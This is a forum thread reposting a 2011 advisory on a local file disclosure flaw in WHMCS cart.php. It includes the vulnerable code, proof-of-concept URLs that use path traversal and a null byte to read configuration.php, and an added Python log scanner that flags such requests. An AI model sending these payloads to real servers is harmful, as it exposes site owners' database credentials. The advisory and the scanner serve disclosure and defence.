
Whmcompletesolution (cart.php) Local File Disclosure - Webmasters - Nairaland


Whmcompletesolution (cart.php) Local File Disclosure by Slyr0x: 11:13am On Oct 20, 2011
# Title      : WHMCompleteSolution (cart.php) Local File Disclosure
# Author     : Lagripe-Dz
# Product    : WHMCS ( WHMCompleteSolution )
# Vendor     : http://whmcs.com/
# Date       : 10/01/2011
# Version    : 3.x.x , 4.0.x
# Tested on  : linux+apache

================================================================

Vuln file: cart.php
---------

Vuln code:
---------

if ( $a == "add" )
{
    $templatefile = "configureproductdomain";
    // ...etc
}

if ( $a == "login" )
{
    $templatefile = "login";
    // ...etc
}
// ...
outputClientArea( $templatefile, $nowrapper );
# outputClientArea function will display
# "./templates/orderforms/cart/{$templatefile}.tpl"


Details :
---------

If variable "$a" has a true value, it will set the "$templatefile" value by
default,
but when the "$a" value doesn't match the default values
you can control "$templatefile" and use it as ( File Disclosure ).


Proof of Concept :
------------------

http://domain.tld/[PATH]/cart.php?a=[wrong_value]&templatefile=[LFD]%00

http://domain.tld/[PATH]/cart.php?a=test&templatefile=../../../configuration.php%00


Note*: view the page source to see the disclosed file.

Solution :
----------

Update to the latest version

http://www.exploit-db.com/exploits/17999/
Re: Whmcompletesolution (cart.php) Local File Disclosure by Slyr0x: 11:20am On Oct 20, 2011
So it won't look like I posted jargon, lemme just explain.

Basically there is a Local File Disclosure vulnerability in WHMCS Versions - 3.x.x , 4.0.x.

How does it work?

An attacker can pull "sensitive files" off your server with the exploit below

"/cart.php?a=test&templatefile=../../../configuration.php%00" by doing this

http://example.com/cart.php?a=test&templatefile=../../../configuration.php%00

where http://example.com is the vulnerable WHMCS site.
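
For site owners checking whether this has been tried against them, the following is an added example (not part of the thread or the original advisory) that scans an Apache access log for cart.php requests carrying a client-supplied templatefile parameter. The log lines, IP addresses and the /whmcs/ path are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache access-log lines (documentation IPs, assumed /whmcs/ path).
SAMPLE_LOG = """\
203.0.113.5 - - [20/Oct/2011:11:02:11 +0100] "GET /whmcs/cart.php?a=add&pid=3 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
198.51.100.7 - - [20/Oct/2011:11:03:40 +0100] "GET /whmcs/cart.php?a=test&templatefile=../../../configuration.php%00 HTTP/1.1" 200 412 "-" "curl/7.21"
198.51.100.7 - - [20/Oct/2011:11:03:59 +0100] "GET /whmcs/cart.php?a=x&templatefile=%2e%2e%2f%2e%2e%2fconfiguration.php%2500 HTTP/1.1" 200 398 "-" "curl/7.21"
203.0.113.9 - - [20/Oct/2011:11:05:02 +0100] "GET /whmcs/cart.php?a=view&templatefile=login HTTP/1.1" 200 7001 "-" "Mozilla/5.0"
"""

REQUEST = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*" (\d{3})')


def fully_decode(value, rounds=3):
    """Undo repeated URL-encoding (e.g. %2500 -> %00 -> NUL byte)."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan(log_text):
    """Return (client_ip, status, decoded_value, reasons) for each templatefile hit."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue
        ip, target, status = match.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/cart.php"):
            continue
        # cart.php sets $templatefile itself, so any request supplying it is worth a look.
        for raw in parse_qs(url.query).get("templatefile", []):
            value = fully_decode(raw)  # parse_qs already decoded one layer
            checks = (("traversal", ".." in value),
                      ("path-separator", "/" in value or "\\" in value),
                      ("null-byte", "\x00" in value))
            reasons = [name for name, hit in checks if hit]
            findings.append((ip, status, value, reasons or ["client-set-template"]))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request only shows the page was served; whether a file was disclosed depends on the installed version, so treat hits as a prompt to update and rotate the credentials in configuration.php.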
Re: Whmcompletesolution (cart.php) Local File Disclosure by gorimapa1(m): 3:58pm On Oct 20, 2011
Karamba
